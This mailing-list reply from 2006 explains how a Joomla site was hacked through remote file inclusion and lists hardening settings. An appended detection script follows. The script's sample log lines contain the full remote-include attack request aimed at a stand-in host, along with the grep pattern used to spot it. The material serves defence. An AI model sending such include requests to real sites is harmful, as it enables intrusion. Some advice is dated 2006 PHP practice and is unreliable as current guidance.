Re: The site is down

Author: JD Austin
Date:  
To: Main PLUG discussion list
Subject: Re: The site is down
They made some hard core changes in the most recent security update.
http://www.joomla.org/content/view/1843/74/
In previous updates you just untarred the patch over your installation
and were done; this one requires a bit more.
In the most recent update some things weren't completely obvious like
overwriting your .htaccess file with the htaccess.txt file they provided,
setting safe mode and magic quotes on, register globals off.
The htaccess.txt file they included takes care of the malformed URLs
that are typically used to hack joomla extensions and php scripts in
general.
If the web server has mod rewrite I'd recommend turning on the search
engine friendly links too.
Any joomla extensions that don't work with register globals off should
be replaced anyway.

The most recent update (1.0.11) required a few changes:

    * Set Register Globals off
    * Set Magic Quotes on
    * Change the .htaccess to match the htaccess.txt file.
    * edit globals.txt and change RG_EMULATION to 0: define(
      'RG_EMULATION', 0 );
If your host has register globals on you can change it by adding this to
the top of the .htaccess file:
    php_flag register_globals 0

Add this if magic quotes are off:
    php_flag magic_quotes_gpc on

If you're not sure, create a php file in the web root and look at the
php output:

    <?php phpinfo(); ?>

In some cases I've had to download the full install and overwrite all of
the Joomla files to eliminate issues with upgrading.
For older Mambo sites you have to update the database too.

One of my joomla sites was hacked a few months ago. They used
com_extcalendar and malformed URLs that use php to overwrite the
configuration files.
In my case they created a bunch of shell scripts in my /tmp directory
and used php to launch them to do ssh scanning.
If you grep your apache access log for 'mosConfig_absolute_path=http'
you'll likely find the hack attempts.

JD
Technomage wrote:
> need some help with security (firewall, etc?)?
>
> I am working on a machine in california right now that has similar programs
> running. got sdome firewall ideas that might do the trick.
>
> let me know.
>
> TMH
>
> On Tuesday 05 September 2006 07:37, Alan Dayley wrote:
>
>> The PLUG website is down. It was hacked sometime early this morning.
>> (Joomla! and or its addons is proving to be quite insecure.)
>>
>> I don't have time to do much with it right now. It'll have to wait till
>> tonight. Sorry about that. Please be as patient as possible.
>>
>> Alan
>>
>>
>> ---------------------------------------------------
>> PLUG-discuss mailing list -
>> To subscribe, unsubscribe, or to change you mail settings:
>> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>>



--
JD Austin
Twin Geckos Technology Services LLC
email:
http://www.twingeckos.com
phone/fax: 480.288.8195
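An added example, not part of JD's post, showing the two checks the post describes in script form: grepping the Apache access log for the 'mosConfig_absolute_path=http' indicator and reporting which client addresses sent such requests, and verifying that the php_flag lines recommended above are actually present in .htaccess. The log lines and .htaccess fragment are constructed here so the script runs offline; the include host (example.invalid) and the addresses are placeholders, and the temp-file paths are assumptions to replace with your own log and web root.

```shell
#!/bin/sh
# Added example (not from the original post): detect the request pattern JD
# describes in an Apache access log and confirm .htaccess hardening flags.

INDICATOR='mosConfig_absolute_path=http'

# Constructed sample log in Apache combined format. Two requests carry the
# indicator (placeholder include host example.invalid); the rest is normal traffic.
SAMPLE_LOG="$(mktemp)"
cat > "$SAMPLE_LOG" <<'EOF'
203.0.113.7 - - [05/Sep/2006:03:12:01 -0700] "GET /index.php?option=com_extcalendar&mosConfig_absolute_path=http://example.invalid/x.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
198.51.100.2 - - [05/Sep/2006:03:12:05 -0700] "GET /index.php HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Sep/2006:03:12:09 -0700] "GET /index.php?option=com_extcalendar&mosConfig_absolute_path=http://example.invalid/x.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
198.51.100.9 - - [05/Sep/2006:03:13:00 -0700] "GET /images/logo.png HTTP/1.1" 200 4210 "http://www.example.org/" "Mozilla/5.0"
EOF

# Constructed .htaccess fragment containing the two php_flag lines from the post.
SAMPLE_HTACCESS="$(mktemp)"
printf 'php_flag register_globals 0\nphp_flag magic_quotes_gpc on\n' > "$SAMPLE_HTACCESS"

trap 'rm -f "$SAMPLE_LOG" "$SAMPLE_HTACCESS"' EXIT

# Number of requests containing the indicator (the lines the post's grep would show).
# grep -F treats the pattern literally, so '.' and '?' in it are not regex metacharacters.
count_hits() {
    grep -c -F "$INDICATOR" "$1"
}

# Print "count ip" for every client that sent a matching request, busiest first.
# The client address is field 1 of the combined log format.
scan_access_log() {
    grep -F "$INDICATOR" "$1" | awk '{ print $1 }' | sort | uniq -c | sort -rn
}

# Return 0 only if .htaccess turns register_globals off AND magic_quotes_gpc on.
# Apache directive names and flag values are case-insensitive, hence -i.
check_htaccess() {
    grep -qiE '^[[:space:]]*php_flag[[:space:]]+register_globals[[:space:]]+(0|off)[[:space:]]*$' "$1" &&
    grep -qiE '^[[:space:]]*php_flag[[:space:]]+magic_quotes_gpc[[:space:]]+(1|on)[[:space:]]*$' "$1"
}

echo "Requests with $INDICATOR: $(count_hits "$SAMPLE_LOG")"
echo "Clients sending them:"
scan_access_log "$SAMPLE_LOG"
if check_htaccess "$SAMPLE_HTACCESS"; then
    echo ".htaccess: register_globals off and magic_quotes_gpc on are set"
else
    echo ".htaccess: hardening flags missing"
fi
```

To use it against a real site, replace the two mktemp files with the path to your access log and your web root's .htaccess; the indicator string is the one from the post and can be extended with other parameter names the same way.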